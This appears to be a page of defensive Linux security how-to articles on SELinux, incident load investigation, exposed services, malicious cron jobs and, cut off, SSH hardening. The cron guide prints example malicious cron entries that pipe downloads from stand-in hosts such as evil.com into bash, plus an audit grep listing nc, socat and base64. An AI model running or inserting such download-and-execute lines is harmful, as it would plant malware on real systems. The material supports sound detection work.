Expert Insights: In-Depth How-To Articles

access controlSELinuxsystem administration

SELinux Troubleshooting: What to Check Before You Disable SELinux

SELinux troubleshooting is a necessary skill for any system administrator. When a service fails despite correct file permissions and ownership, the immediate instinct is often to disable SELinux to confirm if the security policy is the bottleneck. While turning off enforcement frequently "fixes" the immediate symptom, it hides the underlying configuration flaw—such as an incorrect context or a policy violation—that could leave your system exposed. This guide outlines a systematic approach to troubleshooting SELinux without compromising system security. . What is SELinux? Think of what is SELinux as a gatekeeper that doesn’t care who you are—it cares what you’re trying to do. While standard Linux permissions check if you have the "right" to touch a file, SELinux checks if the process itself should be doing that action. It's essentially a mandatory access control system that adds a massive layer of safety, even if your user permissions are wide open. Why does SELinux block access when Linux permissions look correct? This is the classic SELinux permission-denied headache. You can have 777 permissions and still get blocked. Why? Because you’re ignoring the SELinux context . SELinux treats every file like it has a secret "passport." If that passport doesn't match the job the service is doing, the kernel shuts it down. It doesn't matter if your Unix permissions are perfect; if the label is wrong, access is denied. Should you disable SELinux when something breaks? Short answer: No. If you're looking for how to disable SELinux, take a breath. Disabling it is like fixing a flat tire by just throwing the car away. It makes the "error" go away, but it leaves your system vulnerable. Always assume the policy is doing its job until you prove otherwise. Why does everything work after you disable SELinux? It’s a false positive. Everything works because you’ve ripped out the referee, not because your code or file structure is actually correct. You might still have an applicationrunning with the wrong path or binding to a dangerous port, but now the system won't tell you about it. What does SELinux status tell you? Always check SELinux status before doing anything else. It tells you if you're in Enforcing, Permissive, or Disabled mode. If you’re already in Permissive mode and things are still failing, you know your problem isn't SELinux—it's something else entirely. How do you check SELinux status? Keep it simple: run sestatus or getenforce. Knowing how to check SELinux status is your first real step in the investigation. If the output says "enforcing," you know exactly why your app is throwing errors. What are the SELinux modes? Enforcing: The system is actually doing its job. Permissive: It’s a "watch and report" mode. It won't block anything, but it’ll log every single thing that would have been blocked. Disabled: The security framework is dead in the water. Avoid this. What does SELinux permissive mean? SELinux permissive is your best friend during a crisis. It lets your services keep running, but it keeps the "evidence" flowing into your logs. It's the gold standard for troubleshooting. When should you set SELinux to permissive mode? Only when you're 90% sure SELinux is the culprit. Don't leave it here forever. Use it to verify if the app starts working. If it does, you've confirmed it's an SELinux issue and can move on to fixing the labels. Is SELinux permissive mode the same as disabling SELinux? People confuse these all the time. They are not the same. In permissive mode, the system is still checking policy and writing to the audit log. If you disable SELinux, you stop the engine. You lose the logs, you lose the visibility, and you lose the security. Where are SELinux logs? If you're hunting for answers, the SELinux audit log (/var/log/audit/audit.log) is where you'll find them. When you check SELinux logs, you aren't looking for a "success" message; you're looking for the red ink that explains exactly what thekernel hated about your last request. What is an SELinux AVC denial? An SELinux AVC denial is the "who, what, where" of your problem. It's the log entry that says: "Process X tried to do Action Y on Object Z, and I blocked it." It’s the closest thing you’ll get to a clear explanation from the OS. What is an SELinux context? It's basically a security tag. Every file, process, and port has one. If a web server needs to read a file, the file's SELinux context has to match what the web server policy expects. If you moved a file from a home folder to /var/www/html, that label likely didn't update. That's a classic SELinux file context mismatch. Why do SELinux contexts cause permission-denied errors? It's almost always a labeling issue. If you move or restore files, the labels don't always tag along. If you’re seeing errors, you probably need to run restorecon to reset them to their proper state. Why does SELinux break after moving files? Files don't always "inherit" the labels of their new home. You move a file, the system keeps the old label, and the service now thinks that file is an intruder. That's why your app suddenly stops working after a file transfer. What is an SELinux policy? It's the rulebook. Everything is governed by the SELinux policy . Most of the time, the policy is fine, and your application is just trying to do something non-standard. Can SELinux policy block ports or network connections? Absolutely. If your app tries to use a non-standard port, SELinux might shut it down. Check if you need to update the policy or toggle a boolean to allow that specific SELinux port. What are SELinux booleans? Think of booleans as "on/off" switches for common policy exceptions. You don't need to rewrite the whole rulebook; just flip a boolean using getsebool if you need to allow a common, safe action. Should you use audit2allow to fix SELinux problems? Be careful with audit2allow. It effectively writes a new policy based on your last error. If you’re justmislabeling files, audit2allow is overkill—it’ll just mask the problem. Fix the labels first. How do you troubleshoot SELinux without disabling it? Stick to the routine: Check the status. Check the logs for AVC denials. Check the file contexts. Toggle permissive mode if you need to see the "hidden" errors. Fix the labels or booleans. Don't reach for the "off" switch until you've exhausted every other option. Is SELinux worth it? Is SELinux worth it? The learning curve is steep, and it's definitely annoying when it breaks your workflow. But when you realize it’s the only thing keeping a compromised web server from trashing your database, you’ll be glad it's there. Keep it on, learn the basics, and you'll be ahead of 90% of other admins. Want more Linux security news, vulnerability analysis, and software supply chain updates? Subscribe to the LinuxSecurity Newsletter and get the latest threats, advisories, and expert insights delivered directly to your inbox. Related Reading Configuring SELinux: An In-Depth Guide to Securing Your Linux System SELinux vs. AppArmor: Key Trends, Security Insights & Frameworks . Learn how to effectively troubleshoot SELinux without disabling it, ensuring system security and functionality is maintained while correcting errors.. SELinux Troubleshooting, system security, access control, policy enforcement. . Dave Wreski

Jun 25, 2026 •

Dave Wreski How to Harden My Filesystem

incident responseopen-sourceperformance monitoring

How to Investigate High System Load During a Security Incident

When a production server spikes at 99% CPU or the disk starts grinding, the knee-jerk reaction is usually to blame a bad code push or a runaway backup job. But if you’ve spent enough time in security incident response, you know that "performance issues" are often the first sign that you’re dealing with Linux malware. . If you don't have a systematic way to look past the performance graphs, you’re just guessing. Here is how you use Linux commands to peel back the layers when a system starts acting erratically. Understanding What "Normal" Load Means Before you touch a command, figure out what changed. A lot of ugly-looking spikes in Linux CPU usage end up being backups, software updates, or some forgotten batch job that nobody documented. Sometimes it's worse. The point is that you don't know yet. Build a timeline before you start chasing theories. When did the load increase? Did it happen after a deployment? Is it one server or twenty? The answers usually tell you where to look next. Once you've got that, start identifying what's actually consuming the resources. Step 1: Identify the Resource Under Stress Stop looking at the load average and start looking at the character of the load. Use standard Linux commands to isolate the bottleneck: CPU: Use the Linux top command or htop to identify the most active tasks. Memory: Run free -h to see if your Linux memory usage is being cannibalized by unauthorized processes. Disk: Run iostat -xz 5 to see if the disk I/O is saturated. Network: Use iftop to see if there is unexpected data movement. Step 2: Find the Process Responsible At some point, every load investigation comes down to a process. Maybe the server is pinned at 100% CPU. Maybe memory usage is climbing until the system starts swapping. Whatever the symptom, the next question is always the same: what's actually consuming the resources? Start by looking at the busiest processes on the system: ps aux --sort=-%cpu | head If memory pressureis the problem, switch your focus: ps aux --sort=-%mem | head Finding the process is only the beginning. The more useful question is how it got there. A process name by itself rarely tells the whole story, which is why I usually follow the process tree next: pstree -p Attackers don't need creative names. A malicious process can blend in perfectly if it's launched from something that looks legitimate. The parent-child relationship often reveals far more than the process name ever will. A service spawning an unexpected shell, a web server launching a binary, or a user process creating background workers are all worth a closer look. Step 3: Investigate the Process Context If a process looks suspicious, don't kill it yet. If it’s a Linux security incident, you might be helping the attacker clear their tracks. Verify location: Use which or ls -lah /proc/ /exe . If the binary is running out of /tmp or /dev/shm , treat it as suspicious until proven otherwise. Check User Context: Run ps -o user,pid,cmd -p . A process running as root that originates from a temporary directory is a massive red flag. Step 4: Detecting Cryptojacking Cryptojacking has become the go-to for attackers because it’s easy money. It doesn't look like an intrusion; it just looks like a hungry application. But miners have a tell: they have to talk to a mining pool. Use the Linux ss command ( ss -tulpn ) or netstat -plant to view your connections. If you see persistent, long-lived connections to foreign IPs on unknown ports, that is your indicator. If a process is consuming 80% CPU and talking to an external host, you have found the source of your Linux malware. Step 5: Check for Persistence Attackers aren't stupid. They know you’ll restart the machine or kill the process, so they need a way to make sure their code comes back. I start with the basics. Run crontab -l for the current user, but don't stop there. Attackers love hiding in the system-wide crons. Go dig through thefiles in /etc/cron.* —I’ve personally caught more than one backdoored script tucked into cron.daily or cron.weekly because the attacker knew a once-a-week execution would keep their resource footprint low enough to dodge most basic alerts. Then, hit the services. Run systemctl list-units --type=service . If you see a service name that looks like a garbled string or just doesn't belong, that’s your lead. Pull the unit file and see what it’s actually executing. It’s almost never a legitimate service; it’s usually just a lazy wrapper script that points to a hidden binary somewhere else on the disk. Step 6: Review Logs for Supporting Evidence When you’re in the middle of a security incident response event, looking at logs feels like a chore, but it’s where the story is actually written. Stop scrolling blindly. Use journalctl -xe to see what the kernel and system have been complaining about. If I suspect a remote breach, my first stop is journalctl -u ssh . I'm looking for the obvious stuff—failed logins that look like brute-force attempts—but keep an eye out for the successful logins from IPs that make no sense. If you see a user you don't recognize, or a sudden sudo elevation right before the resource spike started, you’ve found your entry point. Attackers aren't usually quiet about service installations, either; look for entries that show new binaries being dropped or permissions being changed. It’s the digital equivalent of seeing someone leave muddy footprints all over your clean floor. When to Remediate When you are sure it’s malicious, you may need to kill a Linux process—but don't destroy your evidence first. Before you execute the command to kill a process in Linux ( kill -9 ), make sure you have: Captured the process arguments and environment variables: ps eww -p and cat /proc/ /cmdline . Documented active network connections. Preserved logs and taken screenshots or exports from your EDR. Collected hashes of the suspiciousbinary: sha256sum /path/to/binary . After the adrenaline fades, align your internal procedures with CISA Incident Response & Recovery guidance . If you find a compromised process, cross-reference the behavior with the MITRE ATT&CK Resource Hijacking technique . Final Thoughts on Linux Security High load is a symptom. Whether it’s just a bad database index or a serious breach, the methodology remains the same: keep your head, trace the process, verify the context, and don't take anything at face value. Tools like Red Hat's performance monitoring documentation are there for a reason—master them, and you’ll spend a lot less time guessing. Want more Linux security news, vulnerability analysis, and software supply chain updates? Subscribe to the LinuxSecurity Newsletter and get the latest threats, advisories, and expert insights delivered directly to your inbox. Related Reading How to Diagnose Suspicious Outbound Connections on Linux How to Detect Unauthorized File Changes on Linux GitHub Actions Runner Security on Linux: Risks and Hardening Tips Linux IDS vs. IPS: What's the Difference and Which Do You Need? . Discover effective Linux command techniques to investigate high system load during security incidents and enhance response strategies.. Linux system load, performance issues, investigate security incidents. . Dave Wreski

Jun 23, 2026 •

Dave Wreski How to Secure My Network

Banner 2 1028x280 1708121730 1 1771599631

Reduce Attack Surface Of Public Linux Servers Hero Esm H240

network securityLinux administrationsecurity audit

How to Find and Secure Exposed Services on Linux

Open ports have a way of accumulating over time. A test environment gets deployed and never removed. An administrative interface is exposed for troubleshooting and left in place. A database that was supposed to listen internally ends up reachable from the internet. . Attackers look for these mistakes constantly. Redis, Elasticsearch, MongoDB, Jenkins, and similar services still show up on internet-facing systems where they were never meant to be exposed. Sometimes it's a temporary change that becomes permanent. Sometimes a firewall rule was missed during deployment. Sometimes nobody realized the service was listening externally. The result is the same. A service intended for internal use ends up answering requests from anywhere. The first step is figuring out what's actually reachable. From there, it's usually obvious what belongs on the internet and what doesn't. Document Your Current State Before Making Changes Before disabling services or modifying firewall rules, establish a baseline of the system's current configuration. These records can help with troubleshooting, rollback planning, and future audits. Collect the following information: hostnamectl ip addr sudo ss -tulpn sudo lsof -i -n -P sudo systemctl list-unit-files --state=enabled sudo systemctl --failed Save the output to a secure location. At a minimum, you should document: Network interfaces and IP addresses Listening services and ports Enabled system services Existing firewall rules Server role and business purpose Security Tip Create a baseline immediately after provisioning a new server. Comparing future scans against a known-good state makes it easier to identify unexpected changes. How to Identify Exposed Services The first step in reducing the attack surface is understanding what is currently listening for connections. Using ss Modern Linux distributions include the ss utility, which is the preferred replacement for netstat . ss -tulpn Example output: Netid State Recv-Q Send-Q Local Address:Port tcp LISTEN 0 128 0.0.0.0:22 tcp LISTEN 0 128 127.0.0.1:3306 tcp LISTEN 0 128 0.0.0.0:8080 Key fields to review include: Protocol (TCP or UDP) Listening address Port number Associated process ID Executable name Pay particular attention to services in the LISTEN state that are bound to all interfaces. Using lsof To map open ports directly to processes: sudo lsof -i -n -P This command shows which applications own active network connections and listening sockets. Using netstat Many administrators still encounter systems that use netstat . sudo netstat -tulpn 2> /dev/null || echo "netstat is not installed" Although considered legacy, it remains common in documentation and troubleshooting workflows. Which Ports Should Raise Immediate Questions? Not every open port is a security problem. However, every exposed service should have a documented owner and business justification. The following ports frequently deserve additional review: Port Service Why Review It 22 SSH Direct internet exposure 21 FTP Legacy protocol with security concerns 23 Telnet Unencrypted remote access 3306 MySQL Often unintentionally exposed 5432 PostgreSQL Common cloud misconfiguration 6379 Redis Frequent attack target 9200 Elasticsearch Data exposure risk 27017 MongoDB Associated with numerous breaches 8080 Web/Admin Services Often forgotten after deployment An open port does not automatically indicate a vulnerability. Instead, ask: Who owns this service? Why is it exposed? Is internet access required? Can access be restricted? Ifnobody can answer these questions, further investigation is warranted. Determine Whether a Service Is Actually Needed Many production servers accumulate services over time as teams deploy software, perform testing, and forget to remove temporary components. Identify the process associated with a listening port: sudo ss -tulpn Example: LISTEN 0 128 *:8080 *:* users:(("java",pid=1234)) Inspect the process: ps -fp 1234 Then review the service: sudo systemctl status Ask the following questions: Is the application still actively used? Is it part of a supported workload? Does it need external connectivity? Can it be restricted to localhost? Is there a business owner? Unused services should be removed or disabled. Find Services Listening on All Interfaces One of the most common exposure issues occurs when applications listen on every network interface. Find services listening on all IPv4 interfaces: sudo ss -tulpn | grep "0.0.0.0" Find services listening on IPv6 interfaces: sudo ss -tulpn | grep "::" Compare these examples: 127.0.0.1:3306 and 0.0.0.0:3306 The first accepts connections only from the local host. The second accepts connections from any reachable network. For database servers, message brokers, and management interfaces, this distinction is often the difference between a secure configuration and an unnecessary exposure. Disable Unnecessary Services If a service is not required, disable it completely. For example: sudo systemctl stop rpcbind sudo systemctl disable rpcbind sudo systemctl status rpcbind Verify the service is disabled: sudo systemctl is-enabled rpcbind Confirm the listening port has disappeared: sudo ss -tulpn Removing unnecessary services not only reduces attack surface but also decreases maintenance and patching requirements. Restrict Services Instead of Removing Them Not every service can be removed. In many environments, the bettersolution is to limit where the service listens. MySQL # my.cnf bind-address = 127.0.0.1 Verify: sudo ss -tulpn | grep 3306 Why: Verify the change actually took effect. Expected result: 127.0.0.1:3306 not: 0.0.0.0:3306 PostgreSQL # postgresql.conf listen_addresses = 'localhost' Apply and verify: sudo systemctl restart postgresql sudo ss -tulpn | grep 5432 Why: Configuration changes without verification create support headaches. Expected result: 127.0.0.1:5432 Internal Web Interfaces listen 127.0.0.1:8080; This approach allows local applications to function normally while preventing external access. For many organizations, restricting exposure provides nearly the same security benefit as removing the service entirely. Audit Firewall Exposure A service may be listening, but that does not necessarily mean it is reachable. Review firewall policies and compare them against listening ports. Firewalld sudo firewall-cmd --list-all UFW sudo ufw status numbered iptables sudo iptables -L -n -v nftables sudo nft list ruleset Compare: Open firewall ports Listening services Intended application requirements Any discrepancy should be investigated. Verify Exposure from an External Perspective Internal checks alone do not provide a complete picture. Administrators should periodically perform scans from a separate host to see what external users can actually reach. Basic full TCP port scan: nmap -Pn -p- Identify service versions and common configurations: nmap -sV -sC Review results for: Unexpected open ports Service version disclosure Forgotten applications Legacy services This step frequently reveals exposures that internal reviews miss. Real-World Example Numerous Elasticsearch, Redis, and MongoDB exposure incidents have occurred because services intended for internal use were reachable from the internet due tofirewall, cloud security group, or binding misconfigurations. Commonly Overlooked Sources of Attack Surface Attack surface extends beyond traditional services. Forgotten Administrative Panels Review systems for: Jenkins Grafana Kibana phpMyAdmin Portainer Administrative tools often provide direct access to sensitive systems and should rarely be exposed publicly. Development and Debugging Services Look for: Node.js development servers Python development servers Java debugging interfaces Temporary testing environments These services are frequently deployed without security controls. Containerized Workloads Inspect running containers: docker ps docker port Depending on your environment, you may need sudo or membership in the docker group. Why: Many production environments still require root or Docker group membership. Cloud Metadata Services Review access controls for: AWS Instance Metadata Service (IMDS) Azure Instance Metadata Service Google Cloud Metadata Service Improper access controls can increase the impact of server compromise. Legacy Test Environments Old staging systems and proof-of-concept deployments often become forgotten attack vectors. Periodically inventory all externally reachable hosts and retire systems that are no longer required. Monitor Exposure Changes Over Time Attack surface management is not a one-time project. New software deployments, containers, updates, and configuration changes continually alter exposure. Regularly review listening services: sudo ss -tulpn Consider automated auditing tools such as: Lynis sudo lynis audit system OSQuery osqueryi "SELECT pid, port, protocol, address FROM listening_ports;" Why: Produces cleaner output and is more useful in a hardening workflow. Additional options include: OpenSCAP AIDE Scheduled Nmap scans Configuration management compliance checks Continuousmonitoring helps detect exposure drift before attackers do. How Often Should You Review Public Linux Systems? How often you should review public Linux systems depends on your risk profile, but they should be reviewed regularly and continuously monitored as part of attack surface management. Weekly Review new listening ports Check newly enabled services Validate firewall changes Investigate unexpected processes Monthly Perform a complete exposure audit Conduct external Nmap scans Review administrative interfaces Verify service ownership After Major Changes Always reassess exposure after: Software deployments Container updates Cloud migrations Infrastructure changes Major operating system updates The attack surface changes whenever the environment changes. Final Thoughts Most exposure issues aren't discovered during an incident response engagement. They're found later, when someone notices a service listening where it shouldn't be, a firewall rule that was never removed, or a system that changed over time without anyone revisiting the original configuration. Redis, Elasticsearch, MongoDB, Jenkins, administrative interfaces, internal dashboards, test environments. The technology changes, but the underlying problem tends to look familiar. Something that was meant to stay internal became reachable from somewhere it shouldn't. Public Linux systems rarely stay static for long. Services get deployed, containers come and go, firewall rules change, and cloud infrastructure evolves with them. Knowing what is exposed today is often more useful than knowing what was exposed six months ago. For more Linux hardening guidance, vulnerability coverage, and practical security administration tips, subscribe to the LinuxSecurity newsletter. Related Reading How to Harden SSH on Linux After Disabling Password Authentication Guide to Auditing UFW Firewall Rules on Long-Term Linux Environments UFW: Important HardeningPatterns for Long-Lived Linux Servers What is Nmap? How To Use It Effectively for Network Security Lynis Installation Guide: Comprehensive Security Assessments Linux Server Hardening Guide for Secure System Management . Attackers look for these mistakes constantly. Redis, Elasticsearch, MongoDB, Jenkins, and similar se. ports, accumulating, environment, deployed, never, removed. . Dave Wreski

Jun 10, 2026 •

Dave Wreski How to Secure My Network

security advisoryintrusion detectionLinux environment

How to Find and Remove Malicious Cron Jobs on Linux

A compromised Linux server can continue running malware long after the initial intrusion. One of the most common persistence techniques is a malicious cron job that silently downloads payloads, restarts malware, or re-establishes attacker access every few minutes. This guide shows how to identify suspicious cron entries, preserve forensic evidence, remove unauthorized scheduled tasks, and verify that no additional persistence mechanisms remain. . What Should You Save Before Removing Cron Jobs Do not start deleting cron entries the moment you see something strange. That can destroy useful timestamps, command paths, usernames, and network indicators. Capture the state first. Backup cron configuration: sudo tar -czf cron-backup-$(date +%Y%m%d).tar.gz \ /var/spool/cron /etc/crontab /etc/cron.d /etc/cron.hourly \ /etc/cron.daily /etc/cron.weekly /etc/cron.monthly 2> /dev/null Save the current user’s crontab: crontab -l > my-crontab-backup.txt 2> /dev/null Save the system crontab: sudo cat /etc/crontab > system-crontab-backup.txt Collect recent cron logs on Ubuntu or Debian: sudo grep CRON /var/log/syslog sudo grep CRON /var/log/syslog | grep -E "(curl|wget|bash)" Collect recent cron logs on Red Hat, CentOS, or Fedora: sudo grep CRON /var/log/cron sudo grep CRON /var/log/cron | grep -E "(curl|wget|bash)" Check recent service activity: journalctl -u cron --since "1 hour ago" 2> /dev/null || journalctl -u crond --since "1 hour ago" Grab process and network context before cleanup: ps auxww ss -tulpn sudo lsof -i -n -P This is not busywork. If cron is only one part of the compromise, these outputs can help you trace the payload, the parent process, and possible outbound infrastructure. How Do You Identify Malicious Cron Entries? Start with the current user, then move across every account. User crontabs are easy to miss during cleanup because they sit outside the obvious /etc/cron.* directories. Checkthe current user’s crontab: crontab -l List stored user crontabs: sudo ls -la /var/spool/cron/crontabs/ 2> /dev/null || sudo ls -la /var/spool/cron/ Check each user’s cron jobs: for user in $(getent passwd | cut -f1 -d:); do echo "=== Cron jobs for $user ===" sudo crontab -u "$user" -l 2> /dev/null || echo "No crontab" done Inspect system-wide cron locations: sudo ls -la /etc/cron.* 2> /dev/null sudo cat /etc/crontab sudo ls -la /etc/cron.d/ 2> /dev/null sudo ls -la /etc/cron.hourly/ 2> /dev/null sudo ls -la /etc/cron.daily/ 2> /dev/null Watch for cron jobs that download and execute code: * * * * * curl http://evil.com/malware.sh | bash Look for jobs that run every minute: * * * * * curl http://malicious-website/payload.sh | bash Check reboot persistence: @reboot /tmp/.hidden/payload Decode suspicious base64 only after copying it somewhere safe: echo 'YmFzaCAuLi4=' | base64 -d Do not run decoded payloads. Read them. Big difference. What Are Common Red Flags in Cron Jobs? Network tools inside cron deserve review. curl, wget, nc, bash, sh, python, perl, base64, eval, and exec are not automatically malicious, but they are common in loader chains. Example suspicious download-and-run pattern: * * * * * wget -O - http://malicious.com/script | sh Example obfuscated entry: * * * * * echo "Y3VybCBedNRwOl8vZXZQbC5jb60=" | base64 -d | bash Scripts launched from temporary paths need attention: * * * * * /tmp/.hidden/miner * * * * * bash /var/tmp/update.sh A job running every minute is not always bad. Detection scripts can check crontabs for malicious activity. Malicious cron jobs can reinfect the file system and execute malicious code on a schedule . But if the command downloads code, runs from /tmp, hides in a dot-directory, or has no owner who can explain it, treat it as suspicious. How Can You Quickly Review Cron Jobs? This script does not removeanything. It just surfaces cron entries that deserve manual review. #!/bin/bash # Cron Security Auditor echo "=== Checking cron jobs for review ===" for user in $(getent passwd | cut -f1 -d:); do sudo crontab -u "$user" -l 2> /dev/null | \ grep -E '(curl|wget|nc|ncat|socat|base64|eval|exec|python|perl|php|openssl)' && \ echo "[REVIEW] Investigate cron entries for user: $user" done find /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly \ -type f -exec grep -H -E '(curl|wget|nc|ncat|socat|base64|eval|exec|python|perl|php|openssl)' {} \; 2> /dev/null grep -r "^\* \* \* \* \*" /etc/crontab /etc/cron.d /var/spool/cron 2> /dev/null echo "=== Audit complete ===" Review each hit before touching it. Ask who owns it, what it runs, why it runs on that schedule, and whether the file path matches normal operations. How Do You Remove Unauthorized Cron Jobs? For a user crontab, edit first when possible: crontab -e Remove only the malicious line, then save. To remove the full current user crontab: crontab -r To remove a specific user’s crontab: sudo crontab -r -u username To remove one line non-interactively: # Show line numbers crontab -l | cat -n # Remove line 27 (example) crontab -l | sed '27d' | crontab - Clean system cron locations only after confirming the file is unauthorized: sudo rm -i /etc/cron.d/suspicious-file sudo rm -i /etc/cron.hourly/malicious-script sudo rm -i /etc/cron.daily/backdoor.sh Edit /etc/crontab manually if the entry lives there: sudo vi /etc/crontab Restart cron if needed: sudo systemctl restart cron 2> /dev/null || sudo systemctl restart crond 2> /dev/null sudo systemctl status cron 2> /dev/null || sudo systemctl status crond How Do You Remove Associated Malware and Scripts? Once the cron entry is gone, remove the payload it was launching. If you delete the payload first, cron may notimmediately stop trying to recreate or download it again. # Find suspected files first. Review output before deleting anything. sudo find /tmp /var/tmp -xdev $ -name "malicious.sh" -o -name ".hidden-miner" -o -name "suspicious-process" $ -ls Confirm the process is no longer running: pgrep -a -f 'suspicious-process' || echo "No matching process found" Watch for the process returning: watch -n 60 'pgrep -a -f "suspicious-process" || echo "No matching process found"' Monitor cron logs while you wait: if [ -f /var/log/syslog ]; then sudo tail -f /var/log/syslog | grep CRON elif [ -f /var/log/cron ]; then sudo tail -f /var/log/cron | grep CRON else journalctl -u cron -u crond -f fi What If the Cron Job Keeps Coming Back? If you remove a suspicious cron job and it reappears later, the cron entry is probably not the root cause. Something else is recreating it. Check for configuration management tools that automatically deploy scheduled tasks. Systems managed by Ansible, Puppet, Chef, Salt, or similar platforms may restore cron jobs during the next configuration run. Look for systemd services or timers that recreate files: sudo systemctl list-timers --all sudo systemctl list-unit-files | grep enabled Inspect custom service definitions: sudo grep -R "cron" /etc/systemd/system /usr/lib/systemd/system 2> /dev/null In containerized environments, the cron job may be baked into the image. If the container is recreated, the cron entry will return. Check the container configuration and image build files instead of repeatedly deleting the job from the running container. Review account activity if the cron job continues to reappear after removal. A compromised user account can simply recreate the entry. Check recent logins: last -a | head -20 Review authentication logs: sudo grep -iE "accepted|session opened|sudo" /var/log/auth.log 2> /dev/null || \ sudo grep -iE "accepted|session opened|sudo" /var/log/secure 2> /dev/null If the cron job keeps returning, focus on identifying what is recreating it rather than deleting it repeatedly. The cron entry is often a symptom of a larger persistence mechanism. What Other Persistence Mechanisms Should You Check? Cron may not be the only foothold. Check systemd services: systemctl list-units --type=service --all systemctl status suspicious-service Check systemd timers: systemctl list-timers --all Review startup scripts: ls -la /etc/init.d/ 2> /dev/null ls -la /etc/rc*.d/ 2> /dev/null ls -la /etc/profile.d/ 2> /dev/null Check SSH keys: cat ~/.ssh/authorized_keys 2> /dev/null sudo cat /root/.ssh/authorized_keys 2> /dev/null Review authentication logs: sudo grep -iE "failed|failure|accepted|session opened|sudo" /var/log/auth.log 2> /dev/null || \ sudo grep -iE "failed|failure|accepted|session opened|sudo" /var/log/secure 2> /dev/null sudo last -a | head -20 If the attacker had root access, assume more than cron changed. Verify packages, binaries, sudo rules, shell profiles, SSH config, and exposed services. How Do You Restrict Who Can Use Cron? Use allow and deny lists where they fit your environment. These files restrict who can use the crontab command. They do not stop already-running cron jobs. Remove existing unauthorized crontabs first. Create an allow list: sudo vi /etc/cron.allow Add approved users: root admin ostechnix Deny everyone else: # When /etc/cron.allow exists, only users listed there can use crontab on common cron implementations. # Do not add "ALL" to /etc/cron.deny; cron.deny expects usernames. sudo touch /etc/cron.deny Set tighter permissions: sudo chown root:root /etc/crontab 2> /dev/null sudo chmod 644 /etc/crontab 2> /dev/null sudo chown root:root /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly 2> /dev/null sudo chmod 755 /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly 2>/dev/null sudo find /etc/cron.d -type f -exec chown root:root {} \; -exec chmod 644 {} \; 2> /dev/null sudo find /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly -type f -exec chown root:root {} \; -exec chmod go-w {} \; 2> /dev/null sudo chmod 644 /etc/cron.allow /etc/cron.deny 2> /dev/null Be careful with permissions. Test scheduled business jobs after changes, especially backup scripts and maintenance tasks. How Do You Monitor Cron Activity? Forward cron logs to a central host when possible. Local logs are useful, but not if the attacker can edit them. Rsyslog example: # In /etc/rsyslog.conf or a file under /etc/rsyslog.d/ cron.* @@logserver.example.com:514 # Restart rsyslog sudo systemctl restart rsyslog Use AIDE to monitor cron paths: # Install AIDE sudo apt install aide -y 2> /dev/null || sudo dnf install aide -y || sudo yum install aide -y # Initialize database sudo aideinit 2> /dev/null || sudo aide --init # Some distributions create a new database that must be moved into place # before integrity checks can run. Check your distribution's AIDE documentation # if the command below fails. sudo mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz 2> /dev/null || true # Configure to monitor cron directories sudo vi /etc/aide/aide.conf 2> /dev/null || sudo vi /etc/aide.conf Add rules similar to these, using your distribution's existing rule names if available: /etc/cron.d CONTENT_EX /etc/cron.hourly CONTENT_EX /etc/cron.daily CONTENT_EX /etc/cron.weekly CONTENT_EX /etc/cron.monthly CONTENT_EX /var/spool/cron CONTENT_EX Run checks: sudo aide --check Tripwire is another option: sudo apt install tripwire -y 2> /dev/null || sudo dnf install tripwire -y || sudo yum install tripwire -y sudo tripwire --init sudo tripwire --check For a live view during triage: #!/bin/bash # cron-monitor.sh while true; do clear echo "=== Active Cron Jobs ===" foruser in $(getent passwd | cut -f1 -d:); do echo "User: $user" sudo crontab -u "$user" -l 2> /dev/null | grep -v "^#" done echo "" echo "=== Recent Cron Executions ===" if [ -f /var/log/syslog ]; then sudo tail -20 /var/log/syslog | grep CRON elif [ -f /var/log/cron ]; then sudo tail -20 /var/log/cron | grep CRON else journalctl -u cron -u crond -n 20 --no-pager fi sleep 60 done Note : Many systems restrict access to /var/log/syslog and /var/log/cron. Using sudo helps avoid permission errors and ensures complete log visibility during investigations. How Do You Audit Cron Jobs Regularly? Cron should be reviewed like sudo rules, firewall rules, and exposed services. Not daily on every host, but often enough that unauthorized changes do not sit for months. Run a weekly audit script: #!/bin/bash # Add to your weekly security checklist /usr/local/bin/cron-audit.sh | mail -s "Weekly Cron Audit" admin@example.com Schedule it: 0 9 * * 1 /usr/local/bin/weekly-cron-audit.sh Use OSQuery where available: # Install osquery sudo apt install osquery -y 2> /dev/null || sudo dnf install osquery -y || sudo yum install osquery -y # Query cron jobs osqueryi "SELECT * FROM crontab;" Use Lynis for broader system checks: sudo apt install lynis -y 2> /dev/null || sudo dnf install lynis -y || sudo yum install lynis -y sudo lynis audit system sudo lynis show suggestions Conclusion Malicious cron jobs are not complicated. That is the problem. A single scheduled command can download malware, restart a backdoor, or restore attacker access long after the original compromise. The response should stay simple too. Preserve evidence. Review user and system cron locations. Remove the unauthorized entry. Delete the launched files. Check systemd, startup scripts, SSH keys, and login profiles. Then lock down who can createscheduled jobs and monitor the cron paths for changes. Cron is normal admin plumbing. Treat unexpected changes to it like a persistence signal. Not proof by itself, but enough to keep digging. . What Should You Save Before Removing Cron Jobs Do not start deleting cron entries the moment y. compromised, linux, server, continue, running, malware, initial, intrusion. . Dave Wreski

Jun 09, 2026 •

Dave Wreski How to Secure My Network

access controlLinux administrationauthentication

How to Harden SSH on Linux After Disabling Password Authentication

Most SSH hardening advice ends at the same recommendation: Disable password authentication and use SSH keys. . That's good advice. It removes entire classes of attacks, including password spraying, credential stuffing, and brute-force attempts against exposed servers. The problem is what happens next. Many administrators treat SSH keys as the finish line when they are really the beginning of the hardening process. Attackers rarely care whether they obtained access with a password or a private key. They care about getting a foothold. Once they're in, the questions become the same. Can they move laterally? Can they escalate privileges? Can they maintain access? Can they avoid detection? SSH keys solve authentication. They do not solve access control, session management, key sprawl, forgotten accounts, excessive privileges, or weak monitoring. Those are the areas that tend to create problems in production environments. This guide focuses on the controls that matter after password authentication has already been disabled. Disable Direct Root SSH Access Internet-facing SSH services receive constant login attempts against the root account. Attackers already know the username. They only need to find a valid authentication path. Direct root access also removes accountability. If five administrators connect as root, the logs show root. Investigating changes becomes harder because individual actions are no longer tied to individual identities. Check the current configuration: sshd -T | grep permitrootlogin Recommended configuration: PermitRootLogin no Apply the change: sudo systemctl reload sshd Administrators should authenticate using named accounts and elevate privileges through sudo when required. Before disabling root login, verify that at least one administrative account has working sudo access and that console access is available 